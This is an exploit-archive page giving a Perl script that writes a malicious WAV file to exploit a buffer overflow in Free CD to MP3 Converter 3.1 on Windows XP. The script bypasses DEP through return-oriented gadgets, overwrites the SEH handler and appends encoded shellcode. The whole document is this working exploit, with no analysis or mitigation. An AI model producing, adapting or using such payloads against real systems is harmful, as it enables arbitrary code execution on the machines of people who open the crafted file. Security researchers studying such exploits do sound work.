ExploitFixes
Free CD to MP3 Converter 3.1 Buffer Overflow Exploit (Bypass DEP + SEH) 2010-11-20 12:15:44

# Exploit Title: £ºFree CD to MP3 Converter 3.1 Buffer Overflow Exploit (Bypass DEP + SEH)
# Origianl exploit by C4SS!0 G0M3S£ºhttp://www.exploit-db.com/exploits/15483/
# Modified by riusksk£¨http://riusksk.blogbus.com£©
# Test on Windows XP SP3 CN
# Data£º2010/11/20

#!/usr/bin/perl
my $junk1 = 'A'x 4112;

my $disabledep = "\x68\xdc\xec\x77"; # 0x77ecdc68 - push esp,pop ebp,ret 4,adjust ebp
$disabledep = $disabledep."\xea\x18\x97\x7c"; # 0x7c9718ea - set eax to 1
$disabledep = $disabledep."\xff\xff\xff\xff"; # balance the stack
$disabledep = $disabledep."\x24\xcd\x93\x7c"; # 0x7c93cd24 - run NX Disable routine
$disabledep = $disabledep."\xff\xff\xff\xff"; # balance the stack

my $junk2 = 'B'x 24;

my $nseh = "\x90\x90\xeb\x06"; # jmp 06
my $seh = "\x80\x14\x40\x00"; # pop pop ret, no safeseh
my $nops = "\x90\x90";
my $shellcode =
"\xb8\xc7\xae\x8e\xae\xd9\xc7\x33\xc9\xb1\x31\xd9\x74\x24" .
"\xf4\x5b\x31\x43\x14\x83\xeb\xfc\x03\x43\x10\x25\x5b\x72" .
"\x46\x20\xa4\x8b\x97\x52\x2c\x6e\xa6\x40\x4a\xfa\x9b\x54" .
"\x18\xae\x17\x1f\x4c\x5b\xa3\x6d\x59\x6c\x04\xdb\xbf\x43" .
"\x95\xea\x7f\x0f\x55\x6d\xfc\x52\x8a\x4d\x3d\x9d\xdf\x8c" .
"\x7a\xc0\x10\xdc\xd3\x8e\x83\xf0\x50\xd2\x1f\xf1\xb6\x58" .
"\x1f\x89\xb3\x9f\xd4\x23\xbd\xcf\x45\x38\xf5\xf7\xee\x66" .
"\x26\x09\x22\x75\x1a\x40\x4f\x4d\xe8\x53\x99\x9c\x11\x62" .
"\xe5\x72\x2c\x4a\xe8\x8b\x68\x6d\x13\xfe\x82\x8d\xae\xf8" .
"\x50\xef\x74\x8d\x44\x57\xfe\x35\xad\x69\xd3\xa3\x26\x65" .
"\x98\xa0\x61\x6a\x1f\x65\x1a\x96\x94\x88\xcd\x1e\xee\xae" .
"\xc9\x7b\xb4\xcf\x48\x26\x1b\xf0\x8b\x8e\xc4\x54\xc7\x3d" .
"\x10\xee\x8a\x2b\xe7\x63\xb1\x15\xe7\x7b\xba\x35\x80\x4a" .
"\x31\xda\xd7\x53\x90\x9e\x26\xa5\x29\x0b\xbe\x1f\xd8\x76" .
"\xa2\xa0\x36\xb4\xdb\x22\xb3\x45\x18\x3a\xb6\x40\x64\xfd" .
"\x2a\x39\xf5\x6b\x4d\xee\xf6\xbe\x3e\x78\x09";

open($fp,">test.wav");
print $fp $junk1.$disabledep.$junk2.$nseh.$seh.$nops.$shellcode;
close $fp;